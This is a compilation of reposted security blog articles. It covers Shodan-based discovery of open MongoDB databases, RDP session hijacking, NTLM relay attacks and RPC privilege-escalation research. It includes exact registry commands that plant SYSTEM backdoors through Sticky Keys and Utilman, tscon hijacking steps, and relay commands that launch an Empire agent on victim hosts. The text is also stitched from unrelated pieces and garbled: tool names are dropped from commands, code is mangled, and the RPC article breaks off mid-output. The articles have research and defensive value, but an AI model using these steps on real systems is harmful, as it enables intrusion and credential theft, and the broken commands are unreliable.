WARNING!! The following information is provided solely in educational purposes and by no means encourages any action against the laws. Please remember that any data fraudulence and unauthorized access is considered a crime. Use this information for research purposes only and please inform the DB owners if you come across their confidential data so that they wouldn’t be involved in any data leak situations.

Yes-yes, sure you can scan all ranges of IP-addresses yourself and have your own VPN-servers to conduct your research. But in order to make it much quicker and easier, it’s enough to just launch a couple of requests in Lampyre with different search parameters, using its imbedded integration with API Shodan.

There are so many of such parameters and today I’ll talk about only two. Let’s assume I want to find any open mongodbs, which were indexed by Shodan last week. Here is a step-by-step of how to do it:

1. Download Lampyre from the website, unpack the archive and install it;
2. Launch the app, spend a couple of minutes to acquire your free license and then create an investigation;
3. In the List of Requests window, choose the Shodan Search request. In the input parameters indicate MongoDB product and set the required time period (November 23–30, for example)
Note: this request gives back the results by pages, 100 results per 1 page. In order to get more data right away, input 1–10 into the Page or Range field and you will get 1000 results;
4. Click Execute and — voila! — enjoy scrolling through your 1000 mongoDBs found.

However, these 1000 mongoDBs are not exactly what we really need. Shodan indexes all services working in the open networks. Also it returns info on the structure of databases: list of MongoDB collections, list of available commands and other technical parameters. This data is available in the Data column.

Here is a screenshot of an example:

Some things might have changed since Shodan indexed, so in order to understand if any database may still be accessed at this moment and what its current structure is, you’ll have to perform one more request. Guess which one? — Ta-dah! Right, Explore DB: MongoDB. What does it do? In real time and through a chain of VPN-servers this request tries to connect to the found MongoDBs by IP-addresses, which act as the input parameters.

So to make it more comfortable for me to perform this request and visualize the results in a convenient way, I will transfer the info on the Shodan Mongo DBs to a schema and select all their obtained IP-addresses in the Content window, right-click any of them (to use them as input parameters) and choose the Explore DB request in the context menu.

As a result, if there is no authorization set in the DB, you’ll get its current structure, list of collections with the quantity and names of the documents in them.

What to do with this data? Everyone decides for himself…

Similar research can be performed in Lampyre also for Elasticsearch and FTP. There will be more requests available soon. Stay tuned!

And by the way, nothing stops you from working with 1000 or even 10000 IP-addresses as input parameters, but this is the matter to talk about in our next posts.

A short video on the topic of this article is available on our youtube channelwhere you can also find some other tutorials on Cyber Threat intelligence. If you go to the channel after reading this article please feel free to comment on the video. If you have any ideas on using Lampyre for Cyber Security you can also Tweet us.

Have a great week!

RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation

( Original text by Kevin Beaumont )

How you can very easily use Remote Desktop Services to gain lateral movement through a network, using no external software — and how to defend against it.

Alexander Korznikov demonstrates using Sticky Keys and tscon to access an administrator RDP session — without even logging into the server.

Brief background on RDP session connection

If you’ve used Remote Desktop Services before, or Terminal Services if you’re as old as me, you will know there’s a feature where you connect to another user’s session — if you know their password. Did you know you can also hijack a session without the user password? Read on.

You can right click a user in Task Manager, use tsadmin.msc, or use the command tscon.exe. It will ask for a password, and bomb if you can’t authenticate as the user:

Some tricks allow credential-less Session Hijacking

Here’s the deal. As revealed by by Benjamin Delpy (of Mimikatz) in 2011 and by Alexander Korznikov on Friday, if you run tscon.exe as the SYSTEM user, you can connect to any session without a password. It doesn’t prompt, it just connects you to the user’s desktop. I believe this is due to the way session shadowing was implemented in Microsoft Windows, and it runs throughout the years like this.

Now, you might be saying ‘If you’re SYSTEM, you’re already root… You can already do anything’.

Yes. Yes you can. You could, for example, dump out the server memory and get user passwords. That’s a long process compared to just running tscon.exe with a session number, and instantly get the desktop of said user — with no obvious trace, or external tools. This isn’t about SYSTEM — this is about what you can do with it very quickly, and quietly. Attackers aren’t interested in playing, they’re interested in what they can do with techniques. This is a very valid technique.

So, you have full blown RDP session hijacking, with a single command.

Some parameters about how far this reaches

  • You can connect to disconnected sessions. So if somebody logged out 3 days ago, you can just connect straight to their session and start using it.
  • It unlocks locked sessions. So if a user is away from their desk, you steal their session AND it unlocks the ‘workstation’ without needing any credentials.
  • It works for the physical console. So you can hijack the screen remotely. It also unlocks the physical console, too.
  • You can connect to ANY session — so if, for example, it’s the Helpdesk, you can connect to it without any authentication. If it’s a Domain Admin, you’re in. Because of the above point (you can connect to disconnected sessions), this makes it an incredibly simple way to laterally move through a network.
  • You can use win32k SYSTEM exploits — there are many — to gain SYSTEM permissions, and then use this feature. Meaning even as a standard user, if patches aren’t applied properly you can use this. Obviously, any route to SYSTEM is valid — e.g. any method to get to a local administrator (there’s a few!).
  • There are no external tools. Nothing to get through application whitelisting. No executable is written to disk.
  • Unless you know what to monitor (more on that later), you won’t know this is happening.
  • It works remotely. You can take over sessions on remote computers, even if you’re not logged into that server.

Gaining SYSTEM for tscon.exe

If you’re an administrator, you can use a service as Alexander demonstrates:

In essence it is really easy, just use the quser command to get the Session ID you want to hijack, and your own SESSIONNAME. Then run tscon with the Session ID for hijack, and your own SESSIONNAME. Your own Session will be replaced with the hijacked session. The service will run as SYSTEM by default — you’re in.

Just remember to delete the service afterwards, if you’re evil.

Here’s an example of it in practice on a Windows Server 2012 R2 server:

Other methods:

  • You can use Scheduled Tasks to gain SYSTEM and run the command. Just schedule the command to run immediately as SYSTEM with interactive privileges.
  • Use can use a variety of methods like Sticky Keys to get SYSTEM, without even needing to log in (in the future). See below.
  • Exploits etc (see above).

Lateral movement

Most organisations allow Remote Desktop through their internal network, because it’s 2017 and that’s how Windows administration works. Also, RemoteApp uses RDP. Because of this, it’s a fantastic way to move around an organisation’s network — forget passwords, just surf around and abuse other people’s access. You appear in the organisation logs as that user, not yourself.

How to backdoor for credential-less hijacking

Remote Desktop bruteforcing is a major problem. Anybody who has setup a honeypot recently will know within seconds you will be getting hit with failed RDP logins. First they portscan, then thousands of login attempts arrive.

It gets worse — I run RDP honeypots, and I see them regularly — when breached they get backdoored using the techniques below.

From research, over 1 in 200 scanned Remote Desktop servers online are already backdoored using these methods. This means that you can session hijack with them right now, without even needing to try to log in or authenticate in any way. That’s bad. Consider Shodan shows there are millions of RDP servers online right now, and the number grows constantly with cloud services etc, this is going to generate… issues.

RDP backdoor method one — Sticky Keys

The concept here is pretty simple — Windows supports a feature called Sticky Keys, which is an Accessibility feature built into the OS and available pre-logon (at the login screen, either via a physical console or via Remote Desktop). It runs as SYSTEM.

If you set Sethc.exe (Sticky Keys) to spawn cmd.exe, you have a backdoor you can use if you are locked out of a box — you have SYSTEM access, so you can do anything even without an account. You can do this by either replacing sethc.exe with cmd.exe — this requires a reboot, and physical access to the box — or just set the registry key using the command below.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

Ta-da! The box is now permanently backdoored. Just Remote Desktop in and at the login screen, hit F5 a bunch of times.

Method two — Utilman

It’s exactly the same as before, just trojan utilman.exe instead. At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

Scanning for backdoor’d RDP servers

There is a prebuilt tool here, which works wonders — just spin it up and find servers which already have a SYSTEM level backdoor exposed:ztgrace/sticky_keys_hunter
sticky_keys_hunter — A script to test an RDP host for sticky keys and utilman

From online scanning, a significant amount of open RDP servers online are already backdoored.

Mimikatz module

There is now a Mimikatz module for very easily doing this:gentilkiwi/mimikatz
mimikatz — A little tool to play with Windows

gentilkiwi rocking it


OS-I had a section about Window Server 2016 here, however after further investigation it appears to also be impacted. After testing this applies to every OS since Windows 2000, including Windows 10 and 2016.

Group Policy — I strongly recommend you use Group Policy to log off disconnected sessions, either immediately or soon after the user disconnects. This will NOT be popular in IT environments — but the risk is now completely real that they can very easily — with one built in command — be hijacked more or less silently in the real world. I would also log off idle sessions.

Don’t expose RDS/RDP to the internet — if you do, I strongly suggest you implement multi-factor authentication. You can use things like Microsoft RD Gateway or Azure Multi-Factor Authentication Server to get very low cost multi-factor authentication. If you’re exposing RDP directly to the internet and somebody creates a local user or your domain users have easy to guess or reused credentials, things will go downhill fast. Trust me — I’ve seen hospitals and others be ransomware’d by RDS servers.


It is surprisingly very difficult to record session hijacking — there is one event log (Microsoft-Windows-TerminalServices-LocalSessionManager/Operational) which records sessions connecting — however it does not appear to differentiate between a normal user connecting and tscon.exe being used — I’ve been through every other event log and can’t see anything which suggests this is happening. This is actually a major issue and I lobby Microsoft to add some kind of Event Log ASAP — it’s a real gap.

My suggestion is you alert for other related behaviour using the Event Log and tools like Microsoft OMS, Windows Event Forwarding, Splunk etc. You’re looking for SYSTEM being misused.

For example abnormal Service creation and abnormal scheduled task creation should be logged centrally, and recorded against. Additionally, you can look for Mimikatz related activity.

  • k


Q: This isn’t new or a vulnerability.

A: Java applets and macros aren’t new. If the technique works, it will get used. This one has flown under the radar — that doesn’t mean it is not valid.

Q: If you have SYSTEM you already own the box.

A: Correct. Can you type one command and get the unlocked desktop of a user, even if they went on holiday a week ago, without a log of it? Now you can.

Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes)

( Original text by byt3bl33d3r )

This blog post is mainly aimed to be a very ‘cut & dry’ practical guide to help clear up any confusion regarding NTLM relaying. Talking to pentesters I’ve noticed that there seems to be a lot of general confusion regarding what you can do with those pesky hashes you get with Responder. I also noticed there doesn’t seem to be an up to date guide on how to do this on the interwebs, and the articles that I did see about the subject either reference tools that are outdated, broken and/or not maintained anymore.

I won’t go into detail on all the specifics since there are a TON of papers out there detailing how the attack actually works, this one from SANS is a ok when it comes to the theory behind the attack.

Before we dive into the thick of it we need make sure we are on the same page with a couple of things.

NTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2

This is where the confusion starts for a lot of people and quite frankly I don’t blame them because all of the articles about this attack talk about NTLMv1/v2, so when they see Net-NTLMv1/v2 anywhere obviously people wonder if it’s the same thing.

Edit 06/05/2017 — Updated the TL;DR as it was brought to my attention the way I phrased it was still confusing.

TL;DR NTLMv1/v2 is a shorthand for Net-NTLMv1/v2 and hence are the same thing.

However, NTLM (without v1/v2) means something completely different.

NTLM hashes are stored in the Security Account Manager (SAM) database and in Domain Controller’s NTDS.dit database. They look like this:


Contrary to what you’d expect, the LM hash is the one before the semicolon and the NT hash is the one after the semicolon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.

Net-NTLM hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user’s NT hash). Here’s an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:


(This hash was taken from the Hashcat example hash page here)

From a pentesting perspective:

  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller’s NTDS.dit database or from Mimikatz (Fun fact, although you can’t get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that’s perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.

You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.

This article is going to be talking about what you can do with Net-NTLM in modern windows environments.

Relaying 101

Since MS08-068 you cannot relay a Net-NTLM hash back to the same machine you got it from (e.g. the ‘reflective’ attack) unless you’re performing a cross-protocol relay (which is an entirely different topic). However you can still relay the hash to another machine.

TL;DR you don’t have to crack the hashes you get from Responder, you can directly relay them to other machines!

What’s really cool about this? You can use Responder in combination with a relay tool to automatically intercept connections and relay authentication hashes!

The only caveat to this attack? SMB Signing needs to be disabled on the machine you’re relaying too. With the exception of Windows Server OS’s, all Windows operating systems have SMB Signing disabled by default.

Personally, I consider SMB Signing to be one of the most overlooked and underrated security settings in Windows specifically because of this attack and how easy it allows for attackers to gain an initial foothold.

Setting up

Grab Responder (do not use the version of Responder on SpiderLab’s Github repository as it isn’t maintained anymore, you should be using lgandx’s fork), edit the Responder.conf file and turn off the SMB and HTTP servers:

[Responder Core]

; Servers to start
SQL = On
SMB = Off     # Turn this off
Kerberos = On
FTP = On
POP = On
HTTP = Off    # Turn this off
DNS = On

Now you need a relaying tool.

There are 2 main tools that are maintained and updated regularly that can be used to perform relay attacks with Net-NTLMv1/v2 hashes:

I personally use so I’ll stick with that for this blogpost.

Install Impacket using pip or manually by git cloning the repo and running the setup file and it will put the script in your path.

Now you need list of targets to relay to.

How you do that is up to you. I personally use CrackMapExec: V4 has a handy --gen-relay-list flag just for this:

cme smb <CIDR> --gen-relay-list targets.txt

The above command will generate a list of all hosts with SMB Signing disabled and output them to the specified file.

0wning Stuff

Now that you have everything you need, fire up Responder in one terminal window:

python -I <interface> -r -d -w

And in another: -tf targets.txt

By default, upon a successful relay will dump the SAM database of the target.

Buuuuut, you know whats even better? How about executing a command? -tf targets.txt -c <insert your Empire Powershell launcher here>

Now, every time successfully relays a Net-NTLM hash, you will get an Empire agent! How cool is that??!

Here’s a video of how it looks like in practice:

Let’s recap

  1. We’re using Responder to intercept authentication attempts (Net-NTLM hashes) via Multicast/Broadcast protocols.
  2. However, since we turned off Responder’s SMB and HTTP servers and have running, those authentication attempts get automatically passed to’s SMB and HTTP servers
  3. takes over and relays those hashes to our target list. If the relay is successful it will execute our Empire launcher and give us an Empire Agent on the target machine.


SMB Relaying attacks are very much still relevant. Having SMB Signing disabled in combination with Multicast/Broadcast protocols allow attackers to seamlessly intercept authentication attempts, relay them to other machines and gain an initial foothold on an Active Directory network in a matter of minutes.

Now, combine this with something like DeathStar and you have automated everything from getting a foothold to gaining Domain Admin rights!

Shout outs

These are the people responsible for these amazing tools, hard work and research. You should be following them everywhere!

RPC Bug Hunting Case Studies

( Original text by Wayne Chin Yick Low )

In late August of 2018, a Windows local privilege escalation zero-day exploit was released by a researcher who goes with the Internet moniker SandboxEscaper. In less than two weeks from the time the zero-day was published on Internet, the exploit was picked up by malware authors. as stated by ESET, and caused a bit of chaos in the InfoSec community. This incident also raised FortiGuard Labs’ awareness.

FortiGuard Labs believes that understanding how this attack works will significantly help other researchers find vulnerabilities similar to the bug that SandboxEscaper found in the Windows Task Scheduler. In this blog post, we will discuss our approach to finding privilege escalation by abusing a symbolic link on an RPC server.

It turns out that Windows Task Scheduler had flaws in one of its Remote Procedure Calls (RPC) Application Programming Interfaces (API) exposed via an RPC server. The fact is, most RPC servers are hosted by system processes running with local system privilege, and allow RPC clients with lower privilege to interact with them. As with other software, these RPC servers might be susceptible to software issues like denial of service, memory corruption, and logical errors, etc. In other words, an attacker could leverage any vulnerabilities that might exist in an RPC servers.

One of the reasons this zero-day exploit became so popular so quickly is because the underlying vulnerability is so simple to exploit. It is caused by a program logic error which is relatively easy to spot when the correct tools and techniques are used. This particular kind of privilege escalation vulnerability is typically exploited using a bogus symbolic link to escalate files or folders, that in turn could result in privilege elevation for a normal user. For those interested, there are plenty of resources about symbolic link attacks that have been shared by James Forshaw from Google Project Zero.

RPC Server Runtime and Static Analysis Prerequisites

When conducting a new research topic, it is always a good idea to look around to see if there is any available open source tool you can leverage before writing your own tool from scratch. Fortunately, Microsoft RPC is a well-known protocol and has been well reverse-engineered by researchers over the past couple of decades. As a result, researchers have open-sourced a tool named RpcView, which is a very handy tool for identifying RPC services running on the Windows Operating System. This is definitely one of my favourite RPC tools, with many useful features such as searching the RPC interface Universal Unique Identifier (UUID), RPC interface names, etc.

However, it does not serve our purpose here to decompile and export all the RPC information into a text file. Fortunately, upon reading the source code we found that the authors have included the functionality we need, but it is not enabled by default and can only be triggered in debug mode with a specific command line parameter. Because of this limitation, we enabled and adapted the existing DecompileAllInterfaces function into an RpcView GUI. If you are interested in using this feature, our custom RpcView tool is available on our Github repository. We can now discuss the benefit of the “Decompile All Interfaces” feature in the next section.

Fortinet FortiGuard Labs Threat Research

Figure 1: RpcView Decompile All Interfaces feature

When analysing the behaviours of an RPC server, we always call the APIs exposed via the RPC interface. Such interaction with an RPC server of interest can be achieved by sending an RPC request via the RPC Client to the server and then observing its behaviours using the Process Monitor tool in SysInternals. In my opinion, the most convenient way to do this is by scripting rather than writing a C/C++ RPC client that requires program compilation, which is time consuming.

Instead, we are going to use PythonForWindows. It provides abstractions around some of the Windows features in a pythonic way, which relies heavily on Python’s ctypes. It also consists of an RPC library which provides some convenient wrapper functions that save us time when writing the RPC client. For example, a typical RPC client binary needs to define the interface definition language, and you need to manually implement the binding operation, which usually involves some C++ codes. See Listing 1 and Listing 2, below, that illustrate the difference between scripting and programming the RPC client with minimal error handling code. 

import sys
import ctypes
import windows.rpc
import windows.generated_def as gdef
from windows.rpc import ndr

StorSvc_UUID = r"BE7F785E-0E3A-4AB7-91DE-7E46E443BE29"

class SvcSetStorageSettingsParameters(ndr.NdrParameters):
MEMBERS = [ndr.NdrShort, ndr.NdrLong, ndr.NdrShort, ndr.NdrLong]

def SvcSetStorageSettings():
print "[+] Connecting...."
client = windows.rpc.find_alpc_endpoint_and_connect(StorSvc_UUID, (0,0))
print "[+] Binding...."
iid = client.bind(StorSvc_UUID, (0,0))
params = SvcSetStorageSettingsParameters.pack([0, 1, 2, 0x77])
print "[+] Calling SvcSetStorageSettings"
result =, 0xb, params)
if len(str(result)) > 0:
print " [*] Call executed successfully!"
stream = ndr.NdrStream(result)
res = ndr.NdrLong.unpack(stream)
if res == 0:
print " [*] Success"
print " [*] Failed"

if __name__ == "__main__":


Listing 1: SvcSetStorageSettings using PythonForWindows RPC Client

RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle)
RPC_STATUS status;
RPC_WSTR StringBinding = nullptr;

StringBinding = 0;
Binding = 0;
status = RpcStringBindingComposeW(L"BE7F785E-0E3A-4AB7-91DE-7E46E443BE29", L"ncalrpc", nullptr, nullptr, nullptr,&StringBinding);
if (status == RPC_S_OK)
status = RpcBindingFromStringBindingW(StringBinding, &Binding);
if (!status)
SecurityQOS.Version = 1;
SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;

status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
if (!status)
v5 = Binding;
Binding = 0;
*binding_handle = v5;

if (Binding)
return status;

VOID RpcSetStorageSettings()
RPC_STATUS status = CreateBindingHandle(&handle);

if (status != RPC_S_OK)
_tprintf(TEXT("[-] Error creating handle %d\n"), status);

if (!SUCCEEDED(SvcSetStorageSettings(0, 1, 2, 0x77))
_tprintf(TEXT("[-] Error calling RPC API\n"));





Listing 2: SvcSetStorageSettings using C++ RPC Client

After the RPC client has successfully executed the corresponding RPC API, we used the Process Monitor to monitor its activities. Process Monitor is helpful in dynamic analysis as it provides event-based API runtime information. It is worth mentioning that one of the probably lesser known features of Process Monitor is its call-stack information, as shown in Figure 2, which enables you to trace the API calls of an event.

Fortinet FortiGuard Labs Threat Research

Figure 2: Process Monitor API call-stack

We can use the Address and Path information to pinpoint exactly the corresponding module and function routine when doing static analysis via a disassembler like IDA Pro, for instance. This is useful because sometimes you might not be able to spot the potential symbolic link attack patterns using the Process Monitor output alone. This is why static analysis via disassembler comes into play in helping us in discovering race condition issues, which will be discussed in the second part of this blog series.

Microsoft Universal Telemetry Client (UTC) Case Study

Have you ever heard that Microsoft is collecting customer information, data, and file starting details on Windows 10 and above? Have you ever wondered how this works? If you are interested, you can read about it in this excellent article about the mechanism behind UTC.

To start the next phase of our analysis, we first exported all the RPC interfaces from the RpcView GUI to text files. The resulting text files consisted of all the RPC APIs that were callable from the RPC Servers. From the output text files we then looked for the RPC APIs that accept wide string as input until we encountered one of the more interesting RPC interfaces from diagtrack.dll. Later, we confirmed that this DLL component is responsible for the implementation of UTC functionality, especially when judging from the name Microsoft Windows Diagnostic Tracking, from its description shown in the RpcView GUI.

Fortinet FortiGuard Labs Threat Research

Figure 3: RpcView reveals UTC’s DLL component, and one of its RPC interfaces accepts wide string as input

Keep in mind that our goal here is to find the API that could possibly accept an input file path that could eventually lead to privilege escalation, as demonstrated by the Windows Task Scheduler bug. But that requirement alone gives us 16 possible APIs, as shown in Figure 3. Obviously, we need to filter out those APIs that are out of our interest. So we used IDA Pro and started with static analysis to find out which API we should dive into.

I normally first locate the RPC function RpcServerRegisterIf, which is typically used to register an interface specification over RPC server. The interface specification contains the definition of the RPC interface hosted by a particular RPC server. According to the MSDN document, the interface specification is located in the first parameter of the function, which is represented by the RPC_SERVER_INTERFACE data structure with the following definition:

unsigned int Length;
unsigned int RpcProtseqEndpointCount;
void *DefaultManagerEpv;
const void *InterpreterInfo;
unsigned int Flags;

The InterpreterInfo of the interface specification is a pointer to the MIDL_SERVER_INFO data structure, which consists of a DispatchTable pointer that keeps the information of the interface APIs supported by the specific RPC interface. This is indeed the field we are looking for.

typedef struct _MIDL_SERVER_INFO_

const SERVER_ROUTINE* DispatchTable;
const unsigned short* FmtStringOffset;
const STUB_THUNK* ThunkTable;

Figure 4 is an animation that illustrates how we typically traverse the import address table to determine the DispatchTable within IDA Pro.

Fortinet FortiGuard Labs Threat Research

Figure 4: Determining RPC exposed APIs by traversing IAT within IDA Pro

After we have determined the UTC’s interface APIs with the UtcApi prefix, as shown in Figure 4, we tried to determine if any of these interface APIs would lead to any Access Control List (ACL) APIs, such as SetNamedSecurityInfo and SetSecurityInfo. We are interested in these ACL APIs because they are used in changing the discretionary access control (DACL) security descriptor of an object, whether it’s a file, directory, or registry object. Another useful feature in IDA Pro that is probably underused is its proximity view, which shows you a call-graph of a function routine that will be displayed in a graph form. We used the proximity view to find the function routine that is being referenced or called by the ACL APIs mentioned above.

Fortinet FortiGuard Labs Threat Research

Figure 5: IDA’s Proximity view that shows the correlation between SetSecurityInfo and the function routines in diagtrack.dll

However, IDA Pro did not yield any results when we tried to look for the correlation between SetSecurityInfo and UtcApi. Digging further, we found out that the UtcApi placed the client’s RPC request into the workitem queue that will be processed by asynchronous thread. As shown in Figure 5, SetSecurityInfo will be executed when Microsoft::Diagnostic::EscalationWorkItem::Execute is triggered. Basically, this is a call-back function that is responsible for executing escalation requests kept in the work item submitted by the RPC client.

At this point, we needed to figure out how to submit an escalation request. After playing around with various applications, we came across Microsoft Feedback Hub, which is a Universal Windows Platform (UWP) application that comes by default on Windows 10. Sometimes, you might find it useful to debug a UWP application. Unfortunately, you cannot open or attach a UWP application directly under WinDbg and expect it to work magically. However, UWP application debugging can be enabled via PLMDebug tool that comes with Window Debugger included in Windows 10 SDK. You can first determine the full package family name of the Feedback Hub via the Powershell built-in cmdlet:

PS C:\Users\researcher> Get-AppxPackage | Select-String -pattern "Feedback"
PS C:\Users\researcher> cd "c:\Program Files\Windows Kits\10\Debuggers\x86"
PS C:\Program Files\Windows Kits\10\Debuggers\x86>
PS C:\Program Files\Windows Kits\10\Debuggers\x86> .\plmdebug.exe /query 
Package full name is Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe.
Package state: Unknown
PS C:\Program Files\Windows Kits\10\Debuggers\x86>

After we obtained full package name, we enables UWP debugging for the Feedback Hub using PLMDebug again:

c:\Program Files\Windows Kits\10\Debuggers\x86>plmdebug.exe /enabledebug Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe "c:\program files\windows kits\10\Debuggers\x86\windbg.exe"
Package full name is Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe.
Enable debug mode

The next time you launch the Feedback Hub, the application will be executed and attached to WinDbg automatically.

Fortinet FortiGuard Labs Threat Research

Figure 6: Determining the offset of the API call from Process Monitor Event Properties

After we’d launched the Feedback Hub, we followed the on-screen instructions from the application and we started seeing activities in the Process Monitor. This is a good sign, as it implies that we are on track. When we then looked into the call-stack of the highlighted SetSecurityFile event, we found the return address of the ACL API SetSecurityInfo at offset 0x15A091 (the base address of diagtrack.dll can be found in Process tab of Event Properties). As you can see, this offset falls within the routine Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile, as shown under the disassembler in Figure 6, and that also appears in the proximity view demonstrated in Figure 5. This proves that we can utilize the Feedback Hub to reach our desired code path.

In addition to that, the Process Monitor output also told us that this event attempts to set the DACL of the file object, but determining how the file object was derived by doing code static analysis might be time-consuming. Fortunately, we can attach a local debugger to the svchost.exe program that was hosting the UTC service that was given administrative rights because the process is not protected by the Protected Process Light (PPL) mechanism. This gives us the flexibility to dynamically debug the UTC service to understand how the file path was retrieved.

Under the hood, all feedback details and attachments will be kept in a temporary folder with the format %DOCUMENTS%\FeedbackHub\<guid>\diagtracktempdir<random_decimals> after you have submitted it via the Feedback Hub. The random decimal number appended to diagtracktempdir is generated via the BCryptGenRandom API, which means that the generated number is literary unpredictable. But one of the most important criteria in a symbolic link attack is to be able to predict the file or folder name, so the random diagtracktempdir name increases the difficultly of exploiting the symbolic link vulnerability. Therefore, we dove into other routines to find other potential issues.

While we were trying to understand how the diagtracktempdir security descriptor is set, we realized that the folder will be created with the explicit security descriptor string of O:BAD:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY), which implies that the DACL of the object will be granted for Administrator and local system user access only. However, the explicit security descriptor will be ignored if the following registry key is set accordingly:


“NoForceCopyOutputDirAcl” = 1

In a nutshell, diagtracktempdir will be enforced to use an explicit security descriptor when the above registry key is not present, otherwise the default DACL will be applied to the folder that could potentially raise some security issues, as there is no impersonation token being used during folder creation. Nevertheless, you can bypass the explicit security descriptor to this folder if you have an arbitrary registry write vulnerability. But this is not what we are pursuing, so our best bet is to look into the Process Monitor again:

Fortinet FortiGuard Labs Threat Research

Figure 7: Setting DACLs and renaming folder diagtracktempdir

Basically we can summarize the operations labelled in Figure 7 as follows:

1.     Grant access to the current logged-in user on diagtracktempdir under local system privilege

2.     Rename diagtracktempdir to the GUI-styled folder under impersonation

3.     Revoke access of the current logged-in user on diagtracktempdir under impersonation

The following code snippet corresponds to the operations shown in Figure 7:

bQueryTokenSuccessful = UMgrQueryUserToken(hContext, v81, &hToken);
if ( hToken && hToken != -1 )
// This will GRANT access of the current logged in user to the directory in the specified handle
bResultCopyDir = Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile(&hToken, hDir, Sid, GRANT_ACCESS)
if ( !ImpersonateLoggedOnUser(hToken) ) 
bResultCopyDir = 0x80070542;
// Rename diagtracktempdir to GUID-styled folder name
bResultCopyDir = Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle(SecurityDescriptor, v65, Length);
if ( bResultCopyDir >= 0 )
boolRenamedSuccessful = 1;
// This will REVOKE access of the current logged in user to the directory in the specified handle
bSetAclSucessful = Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile(&hToken, hDir, Sid, REVOKE_ACCESS)if (bSetAclSucessful)
// Cleanup and RevertToSelf
// Delete diagtracktempdir folder and its contents


Listing 3: Grant and then revoke access on diagtracktempdir

From Listing 3, we can tell when the file rename operation failed. If the bResultCopyDir has a value of less than 0, it will proceed to the RecursiveDelete function call. It is also worth noting that it calls the RevertToSelf function to terminate the impersonation before the RecursiveDeletefunction is called, which means the target directory and its contents can be deleted under local system privilege, that would allow us to achieve arbitrary files deletion if we managed to use a symbolic link to redirect the diagtracktempdir to an arbitrary folder. Fortunately, Microsoft has mitigated the potential reparse point deletion issues. This RecursiveDelete function has explicitly skipped any directory or folder that has the FILE_ATTRIBUTE_REPARSE_POINT flag set, which is typically set for a junction folder. So we can confirm that this recursive deletion routine does not pose any security risks.

Since we are not able to demonstrate arbitrary file deletion, we decided to show off how to write arbitrary files to diagtracktempdir directory. Looking into the code, we realized that UTC service does not revoke the security descriptor of the diagtracktempdir for a currently logged in userafter the recursive deletion routine has completed. This is intentional, because you do not need to impose a new DACL to a folder that is going to be removed, which is redundant work. But this has also opened up a potential race condition opportunity for the attacker to prevent the deletion of the escalated diagtracktempdir by creating a file with an exclusive file handle in the same directory.  The RecursiveDelete function encounters a sharing violation when attempting to open and delete the file with an exclusive file handle and then exit the operation gracefully. After all, the attacker could drop and execute files in the escalated diagtracktetempdir in a restricted directory, for example C:\WINDOWS\System32.

So the next question is, how did we make the file rename operation fail? Looking into the underlying implementation of Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle, we see that it is essentially a wrapper function calling the SetFileInformationByHandleAPI. It appears that the underlying kernel functions derived from this API will always obtain the file handle of the parent directory with write access. For example, if the handle is currently referenced to c:\blah\abc it will attempt to get the file handle with write access of c:\blah. However, if we specify a directory in which the current logged in user has no write access to, Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle could fail to execute properly. The following file paths are good candidates, as they are known to be restricted folders that disallow folder creation for a normal user account:

·       C:\WINDOWS\System32

·       C:\WINDOWS\tasks

There should not be any problem of winning this race condition as some of the escalation requests involve writing a bunch of log files to our controlled diagtracktempdir and they will take some time to be deleted. So we should be able to win the race most of the time in a modern system with multiple cores if we have successfully created an exclusive file handle in our target directory.

Next, we need to find ways to trigger the code path programmatically using the correct parameters required by UtcApi. Being able to debug and set the breakpoint on the RPC function, the NdrClientCall within the Feedback Hub really makes our life easier. The debugger reveals the scenario ID as well as the escalation path that we should send to UtcApi. In this case, we are going to use the scenario ID {1881A45E-01FD-4452-ACE4-4A23666E66E3} as it seems to consistently show up whenever the UtcApi_EscalateScenarioAsync routine is triggered, and it has led to our desired code path on the RPC Server. Take note that the escalation path has also allowed us to control where diagtracktempdir will be created.

Breakpoint 0 hit
eax=0c2fe7b8 ebx=032ae620 ecx=0e8be030 edx=00000277 esi=0c2fe780 edi=0c2fe744
eip=66887154 esp=0c2fe728 ebp=0c2fe768 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
66887154 ff15a8f08866 call dword ptr [Helper!DllGetActivationFactory+0x6d31 (6688f0a8)] ds:0023:6688f0a8={RPCRT4!NdrClientCall4 (76a74940)}
0:027> dds esp l9
0c2fe728 66892398 Helper!DllGetActivationFactory+0xa021
